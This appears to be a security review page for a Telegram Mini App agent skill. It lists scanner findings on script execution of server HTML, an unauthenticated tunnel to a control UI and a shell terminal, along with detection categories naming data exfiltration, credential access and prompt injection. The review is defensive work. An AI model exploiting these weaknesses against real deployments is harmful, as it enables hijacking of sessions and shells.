TG Canvas Mini App

Security checks across malware telemetry and agentic risk

Overview

The skill is mostly transparent about its powerful features, but it needs Review because pushed web content can run scripts inside the same Telegram Mini App that exposes server shell and control features.

Install only on an isolated machine or container you are willing to expose to trusted Telegram users. Keep ALLOWED_USER_IDS very narrow, use strong BOT_TOKEN/JWT_SECRET/PUSH_TOKEN values, do not run the server as root, prefer markdown/text over untrusted HTML, and avoid running the direct Control UI tunnel unless it is protected by separate strong authentication.

SkillSpector

By NVIDIA

Vulnerability Patterns

Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access

Findings (3)

Intent-Code Divergence

High

Confidence: 98% confidence
Finding: The client renders server-supplied HTML with innerHTML and then explicitly re-creates embedded <script> tags so they execute in the Telegram Mini App WebView. Because this skill also exposes a JWT-gated terminal and optional control UI, any XSS or malicious server-provided canvas payload can steal tokens, invoke privileged actions, or drive the remote shell/control interface from the victim's session.

Context-Inappropriate Capability

Medium

Confidence: 96% confidence
Finding: This script intentionally exposes a localhost-only OpenClaw Control UI on 127.0.0.1:18789 to a public Cloudflare trycloudflare.com URL without any authentication, IP restriction, or transport-layer access control in the script itself. In the context of this skill, which already mentions a high-privilege server-side terminal and optional Control UI proxy, turning an internal admin/control surface into a publicly reachable endpoint substantially increases attack surface and can enable unauthorized remote access to sensitive control functionality.

Unrestricted Tool Access

Medium

Category: Excessive Agency
Content: The Mini App includes an interactive terminal backed by a server-side PTY. > ⚠️ **This grants shell access to the machine running the server**, as the process user. Anyone in `ALLOWED_USER_IDS` can open a bash session and run arbitrary commands. Only add users you trust with shell access to `ALLOWED_USER_IDS`. **How it works:** - Authenticated users see a **Terminal** button in the Mini App topbar.
Confidence: 98% confidence
Finding: run arbitrary commands

VirusTotal

66/66 vendors flagged this skill as clean.

View on VirusTotal